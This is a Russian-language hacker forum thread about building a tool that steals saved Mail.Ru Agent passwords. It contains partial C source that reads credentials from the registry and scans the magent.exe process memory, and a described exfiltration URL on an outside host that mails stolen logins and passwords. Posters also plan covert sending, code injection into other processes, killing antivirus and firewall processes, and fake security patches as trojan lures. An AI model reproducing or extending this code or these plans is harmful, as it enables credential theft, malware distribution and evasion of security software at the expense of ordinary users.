Вот не надо гнать только! Яж никого не напрягаю.. Повторюсь, прога весит 10 кил, так как запакована UPX кто не знает что это, ваши проблемы. А че говорить! Не суть..
PHP: [QUOTE=_hack_ing_]ну ты суперпуперпрограммистмегахэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)[/QUOTE] Лови мега хацкер... #include <windows.h> #include <stdio.h> #include<tlhelp32.h> //-------------------------------------------- //-------------------------------------------- //-------------------------------------------- //-------------------------------------------- BOOL ParsingMagentDump(BYTE *, int, int); //-------------------------------------------- //-------------------------------------------- bool fl_ = 0; //-------------------------------------------- //-------------------------------------------- void printf_(char *msg) { char tmp[255]; sprintf(tmp,msg); CharToOem(tmp,tmp); printf("%s\n",tmp); } //-------------------------------------------- //-------------------------------------------- void write_file(BYTE* b, long i) { HANDLE hFile = CreateFile("C:\\magent.pas", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if(hFile != INVALID_HANDLE_VALUE) { DWORD ret; if (!fl_) { fl_ = 1; printf_("Файл C:\\magent.pas создан.."); } SetFilePointer(hFile, 0, 0, FILE_END); WriteFile(hFile,&b[0],i,&ret,NULL); CloseHandle(hFile); } else printf_("Ошибка создания или открытия файла C:\\magent.pas.."); } //-------------------------------------------- //-------------------------------------------- void start_scanmmemory() { HKEY key = 0; printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins..."); if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS) { char svValueName[MAX_PATH]; memset(&svValueName,0,MAX_PATH); int count=0; DWORD cbValueNameLen = MAX_PATH; DWORD cbValueDataLen = MAX_PATH; DWORD dwType,pasLen; char ttt[255]; while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS) { if (strlen(svValueName) > 0) { sprintf(ttt,"Логин : %s",svValueName); printf_(ttt); BYTE g[255]; BYTE login[255]; memset(&g,0,255); memset(&login,0,255); RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen); int i = strlen(svValueName); memcpy(login,&svValueName[0],strlen(svValueName)); memcpy(&login[i],g,4); sprintf(ttt,"Размер пароля : %d",pasLen-4); printf_(ttt); i+=4; ParsingMagentDump(login, i, pasLen); } memset(&svValueName,0,MAX_PATH); cbValueNameLen = MAX_PATH; cbValueDataLen = MAX_PATH; count++; } if (count == 0) printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins..."); RegCloseKey(key); } else printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins..."); } //-------------------------------------------- //-------------------------------------------- BOOL ParsingMagentDump(BYTE * login, int ls, int ps) { printf_("Сканим список процессов, ищем magent.exe..."); HANDLE hProcessSnap; PROCESSENTRY32 pe32; HANDLE hProcess = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(hProcessSnap == INVALID_HANDLE_VALUE) return false; // ....................... // Посмотрели и хватит!!!! } offset++; if (offset > (0x800000) || fl) break; } } else printf_("Не удалось найти процесс Magent.exe в списке процессов..."); CloseHandle(hProcessSnap); return fl; } //-------------------------------------------- //-------------------------------------------- int main(int argc, char* argv[]) { start_scanmmemory(); printf_("Работа закончена!"); return 0; }
Если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить. 2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?
В будние дни постоянно.. В выходные изредка! =( Проблемы решил! Оказалось все тривиально! Хотя мне не нравится скорость перебора памяти.. Сейчас прикидываю как сразу вычислить относительный адрес сегмента, без тупого брута! =( Мыслишки есть! А так если есть желание пишите на [email protected] или [email protected] Есть интересные мысли! Кстати эту "уязвимость" можно использовать для Фэйков! Народ пользуется почтовыми агентами, если официально всплывет, что он хачится просто, тогда можно фейки делать, типа заплаток от этой уязвимости! =) Ну а там все ограничивается фантазией хакера! Ну да ладно стучите кому интересно! Могу писать что угодно! =) Если грамотно поставите задачу можно написать прикольные трояные! Программингом даавно занимаюсь и работаю программером... Пишу от сервисов до мультипотоковых приложений, от сокетовых приложений до прог под покеты... P.S. Многие скептически отнеслись к моим постам, я понимаю, хотя не хотел ни кого пресаннуть!
darkf0x Маладец! Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту. Так что уберите минус у него!!!!
А ладно... Забейте ребята... Каму интересна идея, допишу прогу тому дам заюзать... И Исходники.. По поводу троянских червей: По всей видимостри эвристика работает у этого антивиря сильно но глючно... Имхо проги имеющие в коде функции перебора и открытия левых процессов, а также чтение из них данных считать за трояны... Как-то... Хер знает.. логика понятна, но не всегда правильна!
на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)! Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...
Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!
Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =) Так на сегодняшний день уже: 1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль) 2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты! Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta... 3. Написал скрипт на php, лежит на darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту! Вызывает так: darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваша почта> сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL... Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex
Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать? Заранее спасибо. ПС автору спасибо за прогу
там не нужен мануал просто отправляешь фаил и потом ловишь пасс но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!
Ну... Уж не так сильно, так немножко подобосрали.. =) Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно! Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете! Например: outpost.exe и т.п. Это нужно для троя, он будет гасить это дерьмо в памяти перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)
